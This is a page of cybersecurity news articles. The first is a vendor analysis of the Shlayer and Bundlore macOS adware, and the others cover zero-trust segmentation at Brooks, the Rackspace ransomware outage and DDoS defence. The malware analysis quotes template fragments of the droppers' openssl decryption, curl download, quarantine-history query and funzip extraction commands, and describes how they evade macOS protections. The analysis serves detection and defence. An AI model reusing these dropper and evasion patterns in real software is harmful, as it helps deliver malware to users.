Connect with us

Cyber Security

Shlayer and Bundlore MacOS Malware Strains – How Uptycs EDR Detection Can Help



MacOS malware Shlayer and Bundlore may have variations, but the behavior of their attacks have not changed – attacking older macOS versions and poorly-protected websites.

Adware strains Shlayer and Bundlore are the most common malware in macOS – although they have slight variations, they have long invaded and bypassed Xprotect, Notarization, Gatekeeper, and File Quarantine, all security features pre-built into macOS. The Uptycs threat research team has tracked these threats, along with 90% of macOS malware in routine analysis and customer telemetry alerts using shell scripts.

In this post, we break down the variations of malicious shell scripts in Shlayer and Bundlore, review the macOS utilities used by these malware strains, and show how Uptycs EDR detection can help.

Shlayer and Bundlore – malicious Shell scripts

The malicious shell scripts used by Shlayer and Bundlore are usually malvertising-focused adware bundlers using shell scripts in the kill chain to download and install an adware payload. The installers are usually macOS disk image files (DMG) that are distributed via compromised Google search results or downloaded from websites with poor reputation (like cracks, keygens).

Upon installation, the disk image mounts thereby initiating the bash shell script installation. The bash script is either a single file or a group of files pointing to the main bash script. An example of one such DMG file with bash scripts is shown below.

FIG 1-1

The bash files download the second-stage adware payload which lures the victim to generally install a fake version of flash player as shown below.

FIG 2-1

Upon installation, the malware bombards the victims machine with ads, and also intercepts browser searches in order to modify the search results to promote more ads.

Shlayer and Bundlore – macOS utilities

Shlayer and Bundlore binaries use several macOS utilities in their attack kill chain. Most variants of them are known to commonly leverage at least 3 of the 5 built-in macOS commands and utilities: openssl, curl, sqlite3, killall and funzip.

The prevalence of usage of these binaries in our daily incoming samples from the threat intelligence systems and customer telemetry for the past quarter is shown below.

FIG 3-1

The working and usage of these utilities in the attack killchain is described below.


The openssl program is a command line tool in macOS for using the various cryptography functions (SSL, TLS) of OpenSSL’s crypto library from the shell. We have observed malicious binaries use openssl with base64, Advanced Encryption Standard (AES), CBC (Cipher Block Chaining) to thwart security scanners in the format as shown below:

openssl enc -aes-256-cbc -d -A -base64 -pass pass:<>


Curl is a macOS command-line tool (curl) used for transferring data using various network protocols. We have observed malicious binaries use curl in the format as shown below:

curl -f0L -o /tmp/<><>


Killall is used to kill the processes specified by command or pattern match. The malicious binaries use this command to kill the script running from the terminal in the format as shown below:

killall Terminal


SQLite is a transactional SQL database engine present in macOS generally used to create databases that can be transported across machines. The malicious binaries use sqlite to get the history of downloaded files from internet in the format as shown below:

sqlite3 /Users/<>/Library/Preferences/ select LSQuarantineDataURLString from LSQuarantineEvent where LSQuarantineDataURLString like “” order by LSQuarantineTimeStamp desc limit 5


funzip is a macOS utility that extracts a ZIP or gzip file directly to output from archives or other piped input. The malicious binaries use funzip to extract the malicious binary with a password and using head or tail commands in the format as shown below:

tail  -c  <>  $0  |  funzip  -<password>

Shlayer and Bundlore – Shell script variants with different faces

Though the abused binaries and behavior is the same, the shell scripts come in different forms and variations to evade security scanners. Some of the most commonly seen variants in the wild are:

  • Bash scripts invoking encrypted Zip file
  • Macho Binary downloading a Bash script
  • Bash scripts decoding the payload

We will have a look into the working of each of these samples.

Bash scripts invoking encrypted Zip file

This variant of bash scripts uses head or tail commands to invoke an encrypted zip file using funzip utility. An example of one such script is is shown below.

FIG 4-1

The functionality of the script is as follows

  • TEMP_NAME is the location to write the unzipped file
  • Tail is used to read the last ‘58856’ of the bash script
  • Funzip -HIC2i1KGA is the password of the ZIP file
  • Chmod +x is used to set the ‘execute permission’ for the unzipped file
  • Killall Terminal is used to kill the running script’s terminal window after the activity bash script activity is completed.

This technique bypassed Gatekeeper, Notarization and File Quarantine security technologies in macOS running macOS versions 10.15 to 11.2.

Macho Binary downloading a Bash script

This variant has an initial macho binary downloading the second stage bash script to install the payload. We identified a malicious binary in our threat intelligence systems that used Amazon AWS storage for hosting and downloading the payload.

Upon execution, the binary downloads a yaml file which points to the bash script named “flashNewInstaller” hosted again in Amazon S3 as shown below.

FIG 5-1

The working of the binary remains pretty much the same as explained in the ‘Bash scripts invoking encrypted Zip file’ section.

Bash scripts decoding an encrypted blob

This variant of bash script is seen in large numbers with several obfuscations in the scripts in our telemetry and threat intelligence systems. The bash script in these variants decrypt the next stage encrypted blobs containing the next stage bash scripts using openssl with base64, Advanced Encryption Standard (AES), CBC (Cipher Block Chaining) to thwart security scanners.

The initial variants of bash scripts contained easily identifiable and readable first stage bash scripts as shown below.

FIG 6-1

However, the latest variants have added several obfuscations to the code to evade security scanners (see Figures 7 and 8).

FIG 7-1

FIG 8-1

While most of the variants and its payloads covered so far are detected and blocked by macOS, this variant of bash scripts and its payloads is not detected with the latest versions of macOS.

Final payload – Bundlore

All the latest samples we analysed, finally initiate download and install of Bundlore. During the installation process, Bundlore also ensures to collect the user’s password by presenting a misleading prompt as shown below.

FIG 9-1

By performing this action, Bundlore doesn’t need any further permissions to perform its actions in the victim’s machine.

A majority of binaries in our intelligence systems downloaded the Bundlore payload to the tmp directory using curl request to the C2 as shown below.

FIG 10-1

The parameters of the C2 translate to the following:

  • c = Campaign ID
  • u = Hardware UUID
  • s = Session GUID
  • o = OS version
  • b = The password which was used in the staged bash scripts

Passive DNS results revealed over a ton of such DMG bundled bash binaries communicating to d2hznnx43bsrxg[.]cloudfront[.]net since May 2021.

Uptycs’ EDR capabilities powered with yara scanning detected Bundlore activity with a threat score of 10/10 as shown in the figure below.

FIG 11-1

Additionally, Uptycs EDR contextual detection provides additional details about the detected malware. Users can navigate to the toolkit data section in the detection alert and click on the name to find out the behavior and working of Bundlore as shown in the figure below.

FIG 12-1

Customer’s can also investigate suspicious behavior by using the following queries:

  • sqlite3 utility to fetch data from internet downloaded history files.
    select * from process_events where path like ‘%/bin/sqlite3’ and cmdline like ‘%LSQuarantineEvent%’
  • Openssl to decrypt the url in the downloaded script.
    select * from process_events where path like ‘%/bin/openssl’ and cmdline like ‘%enc% and cmdlike like ‘%pass:%’


MacOS malware Shlayer and Bundlore may have variations, but the behavior of their attacks have not changed – attacking older macOS versions and poorly-protected websites. However, with Uptycs EDR detection, you can ensure protection for your devices with best-in-class endpoint detection and response, and daily risk tracking.

To keep your devices protected against macOS malware, we recommend the following measures:

  • Keep your devices updated and patched
  • Only download and install files from trusted sources
  • Follow the Shlayer and Bundlore Indicators of Compromise (IOCs) on Github

Source link

Cyber Security

Athletic shoe maker Brooks runs down cyberattacks with zero-trust segmentation



Ransomware was again the top attack type in 2021, with manufacturing replacing financial services as the top industry in a

jon hocut director of information security for brooks Brooks

Jon Hocut, director of information security for Brooks

ssailants’ crosshairs—representing 23.2% of the global attacks remediated last year by IBM Security’s X-Force, according to the company’s Threat Intelligence Index 2022 report.

With news like this, it is not surprising that “ransomware is the threat that keeps me up the most at night,” says Jon Hocut, director of information security for Brooks, the renowned running shoe manufacturer. It doesn’t help that Brooks’ IT infrastructure “grew over time for quite a while before security became a primary issue,” he says. Therefore, the company sought a cyber security solution to address cyberattacks fast, without first requiring a complete network rebuild.

pj kirner illumio cto and cofounder Illumio

PJ Kirner, CTO and co-founder of Illumio

Brooks believes it has found this solution in Illumio Core, a zero-trust segmentation (ZTS) platform from Illumio that can be implemented in stages across a corporate network, protecting the most vulnerable areas first — like installing locks on a bank vault and safety deposit box room while leaving the customer records’ room for another time.

“Illumio’s mission at the highest level is to prevent breaches from becoming cyber disasters,” says PJ Kirner, Illumio’s CTO and co-founder. “Our zero-trust segmentation platform helps people limit the impact of those that do occur, while providing visibility and control of the entire network.”

Illumio Core: a pragmatic approach to zero trust

The “trust no one” logic of zero trust requires users to authenticate their identities whenever they request access to data or applications across the network. But “zero-trust segmentation goes further than just isolating different parts of the network,” says David Holmes, senior analyst at Forrester Research. “Zero-trust segmentation solutions isolate each participating computer, only allowing the specific connections and access explicitly declared first. This is why companies like Brooks are doing the right thing by investing both capital and technical resources into zero-trust segmentation, as it solves not just ransomware but generally any other network-oriented breach.”

Illumio’s pragmatic approach to zero-trust segmentation applies it to the most vulnerable areas first—the ones hackers are most likely to attack—and worries about the rest later. It’s an approach that works, according to a study conducted for Illumio by the offensive security firm Bishop Fox, who staged cyberattacks against an Illumio Core-protected network. Based on the results of those unsuccessful attacks, “zero-trust segmentation can be applied to effectively isolate compromised hosts during an active attack,” the Bishop Fox report concludes. “ZTS can (also) be used proactively to ring-fence entire environments and applications, drastically reducing the pathways available for exploitation through lateral movement.”

How Brooks is applying ZTS

In line with “doing what matters most first,” Brooks has applied Illumio Core to block unauthorized access to hundreds of its Windows servers and cloud resources. Most staff are not supposed to access them as part of their jobs, so proactively blocking requests for access until they can be reviewed by IT security staff is a simple, yet effective, cybersecurity solution.

“We’ve separated our users from our servers and our resources, with the goal of only allowing the minimal amount of traffic that’s necessary back and forth,” Hocut says. “Now these servers may need to talk to each other in a lot of ways on a lot of different ports. But the users from their laptops don’t need to talk across those ports, and so we stop them from doing so without explicit permission.”

It is these laptops, operated by non-IT employees with network access, that are most likely to be the targets of hackers through phishing and other such attacks. So, when it comes to making Brooks’ IT infrastructure more secure using ZTS, “the first thing to do is take those laptops that are most likely to be compromised and segment them off from everything,” says Hocut. “So that isn’t zero trust across the enterprise, there’s just less trust. You’re still saying, ‘well, we’ll trust the servers to talk to each other.’ But we will keep the most likely compromised machines away from the most valuable machines and control that traffic as much as possible.”

The Illumio Core platform documents all access requests, allowing the Brooks IT team to analyze this historical record to detect possible breach attempts, access request trends, and other potential signs of past hacker attacks. All of this data is being used to tweak the company’s cybersecurity policies and procedures and shape its approach to ZTS management and expansion throughout the network going forward.

Implementing ZTS has been relatively painless

It took only four months during the second half of 2022 for Brooks to implement Illumio Core ZTS on its network. “Today, we’re just monitoring alerts and following up on them,” says Ryan Fried, Brooks’ senior security engineer. “It’s easy to just let the alerts go by and block traffic for something like RDP, but we do our best to reach out to the user, understand why they were doing it, and then talk to them about the alternative processes that are in place.”

A case in point: In the past, a Brooks employee “might make SQL connections from their laptop to a database, which is terrifying to me,” Fried says. Now, after such an access attempt has been detected and blocked by Illumio Core, “we direct them to a safe server for us, and then we initiate the RDP or SQL connection from there.”

Ironically, the biggest challenge in implementing Illumio Core at Brooks wasn’t digital but analog. Hocut and his security team had to calm the fears of Brooks’ business executives who were uneasy about their network access being moved to ZTS before they could take action.

“Tell someone on the enterprise resource team that you’re going to mess with the firewalls around the ERP system,” says Hocut. “They’re not going to take you out for beers. They’re going to be concerned about how this is going to affect operations.” Even his boss, Brooks’ VP of Information Technology, wanted to know how the move to ZTS could be done without causing downtime, and maintained without causing issues. “I had to build trust with everyone by explaining that Ryan would set up a proposed ZTS rule set and run it non-operationally for a while to make sure it worked, before taking Illumio Core live,” he says.

Testing before deployment is essential

Doing such testing before deploying any ZTS system is a must, says Holmes. “Zero-trust segmentation is very effective but requires work up front to define the correct segmentation policy,” he explains. “Incorrect policy results in local network outages and manual tuning, adding a layer of complexity to the management of the network. Modern ZTS solutions work hard to divine the correct policy for you, but even the models that use AI aren’t 100% accurate and tuning is required.” Having done this work, Brooks’ ZTS system is working as promised, providing the company with proactive protection from ransomware and other cyber threats.

Looking ahead, Hocut plans to extend Illumio Core into other parts of Brooks’ IT infrastructure. “We’re looking to tighten the granularity of our network controls with different groups of servers so that we’re not treating all servers the same,” he says. “We’re going to be watching outbound traffic from the servers as well. Servers have very specific functions and should only be talking to the outside world in very specific ways. And we can use Illumio to learn what all those current ways are, making the assumption that those are probably all good — and block absolutely everything else.”

Copyright © 2022 IDG Communications, Inc.

Source link

Continue Reading

Cyber Security

Ransomware attack knocks Rackspace’s Exchange servers offline



Cloud services and hosting provider Rackspace Technology acknowledged Tuesday that a recent incident that took most of its Hosted Exchange email server business offline was the product of a ransomware attack. The company shut the service down last Friday.

It was not, initially, clear what had caused the outage, but Rackspace quickly moved to shift Exchange customers over to Microsoft 365, as this part of the company’s infrastructure was apparently unaffected.

Rackpsace offers migration to Microsoft 365

Rackspace said today that there is “no timeline” for a restoration of Exchange service, but it is offering Exchange users technical assistance and free access to Microsoft 365 as a substitute, though it acknowledged that migration is unlikely to be a simple process for every user. Rackspace said that, while the migration is in progress, customers can forward email sent to their Hosted Exchange inboxes to an external server, as a temporary workaround.

The company said that the incident was isolated to its Hosted Exchange business, and that the rest of its lineup of products and services are fully functional. It’s unclear how Rackspace was able to limit the access of the ransomware attackers to one corner of its operations, and the company did not respond to a request for comment on this point.

The investigation is “still in its early stages,” according to Rackspace’s official updates on the matter. The company added that it is, as yet, unable to ascertain whether any consumer data was affected by the attack, but pledged to notify customers if that proves to be the case. Some email archives remain accessible, according to the updates, and Rackspace said that it is working to provide those to customers “where available,” as a precursor to migrating over to Microsoft 365.

Rackspace has also hired “a leading cyber defense firm” to assist in the investigation, though it declined to name the company publicly.

“Out of an abundance of caution, we have put additional security measures in place and will continue to actively monitor for any suspicious activity,” Rackspace said in its latest advisory.

In a public statement, the company said that, despite the ongoing nature of its investigation, it can say that the cyberattack has affected its bottom line. The Hosted Exchange business generates roughly $30 million a year, and a prolonged outage, with its associated costs, is likely to dent that figure.

Copyright © 2022 IDG Communications, Inc.

Source link

Continue Reading

Cyber Security

Rethinking DDoS Defenses | CSO Online



The other night I rented a movie called “The Biggest Little Farm.” The movie depicted a couple who were new to farming but attempting to regenerate a farm that had fallen into disrepair. In the process, they continually ran into challenges regarding how to protect the crops and animals on the farm. Initially, they brought in goats to eat some of the overgrown vegetation, which in turn attracted the initial threat, which was coyotes, who were killing the goats and some of their chickens, so they put up a fence. Then birds of prey became a threat, so the farmers installed roofs on the cages. Then it was rabbits and gophers eating the vegetables, and so on. Each time they encountered a new challenge, the farmers had to adapt and build a new defense. In some cases, they didn’t know what was coming next or how to fight it, so they talked to neighbors to understand how they did it. I started thinking that although this was taking place on a farm, it was the typical approach to perimeter protection whether on a farm, a castle, a fort, or — in today’s world — your network.

This movie was particularly thought-provoking to me as I began reading the current NETSCOUT DDoS Threat Intelligence Report in preparation for a project regarding today’s networks and how customers manage DDoS attacks. The report highlights that distributed denial-of-service (DDoS) attacks are again evolving. This year, reflection/amplification attacks, which have been the preferred attack vector over the past couple of years, took a back seat to TCP state exhaustion attacks. What this indicates is the bad actors are attempting to execute attacks that are increasingly difficult to detect because they mimic legitimate traffic and require defenders to have some level of expertise and technology to recognize them as attacks. 

Adaptive DDoS attacks on the rise

The threat report also reveals that one of the ways attackers are becoming more effective in the destruction of network availability is by using adaptive DDoS. In an adaptive DDoS attack, adversaries perform extensive pre-attack reconnaissance to identify specific elements of the service delivery chain to target — for example, state exhaustion attacks, which made up four of the top five attack vectors this year, target stateful devices that are an integral part of the security stack such as firewalls and VPN concentrators. These targets are attractive because the attacks against them can be smaller in size and designed to evade defenses meant for other threats. Think of the fence designed for the coyotes that won’t stop weasels because the openings are too big. These types of preparations are calculated to minimize the number of administrative boundaries; DDoS attack traffic must traverse, often resulting in fewer opportunities to detect and mitigate the attack. Figure 1 lists some of the characteristics of adaptive DDoS attacks.

threat report adaptive ddos attacks blog figure 1200px NETSCOUT

Figure 1: Five characteristics of adaptive DDoS attacks

Because of these advances in attack methods, network operators must adapt their defenses to meet the new challenges. In our experience, and primarily due to the nature of ever-changing attacks, the required defense needs to be able to not only manage volumetric attacks but also identify the many attacks currently designed to elude known defense measures. And in most cases, this is not a situation where there is a one-size-fits-all solution. As in “The Biggest Little Farm,” the ever-changing threat landscape we are currently experiencing requires an agile defense model — in this case, one that works inside and outside the network and adapts to changing attack vectors and methods.

Why you need a hybrid defense strategy

The best practice for protecting your network in today’s ever-changing DDoS attack landscape is a hybrid approach. Protection strategies of the past will suffice in some situations, such as in an attack designed to overwhelm your internet circuit before traffic arrives on your site. However, attacks specifically designed to evade those protections, such as TCP state exhaustion and application-layer attacks, are the basis for the new attack landscape. Furthermore, the ability to respond quickly to attacks that dodge the cloud solution and hit the network edge, or an internet-facing service is imperative, and having the agility to change defenses rapidly to adapt to subtle changes in adaptive DDoS onsite is crucial.

article 2 image 2 copy NETSCOUT

Figure 2: NETSCOUT Omnis AED provides hybrid DDoS defense

By implementing adaptive DDoS defenses such as NETSCOUT’s Omnis Adaptive Edge Defense (AED) at all edges of their networks, network operators can overpower DDoS attack traffic as it enters the network edge — or before it ever unites into a large-scale attack. With edge-based attack detection combined with cloud-scrubbing capacity, automated bilayer communication, indicators of compromise (IoC) analysis, command-and-control (C2) communication blocking, and current actionable threat intelligence (think of the farmers talking to their neighbors), operators can tackle any DDoS attack before it can cause damage (see Figure 2).

As the movie ended, the farmers were getting management of the constantly evolving threats nature could throw at them under control. The underlying reason for that control was because they began to understand the developing threats and were proactive in their actions to block them. This could be a valuable lesson in our approach to new methods behind DDoS attacks.

For more information on hybrid, dynamic, comprehensive DDoS protection, download the white paper “An On-Premises Defense Is the Cornerstone for Multilayer DDoS Protection.” 

Copyright © 2022 IDG Communications, Inc.

Source link

Continue Reading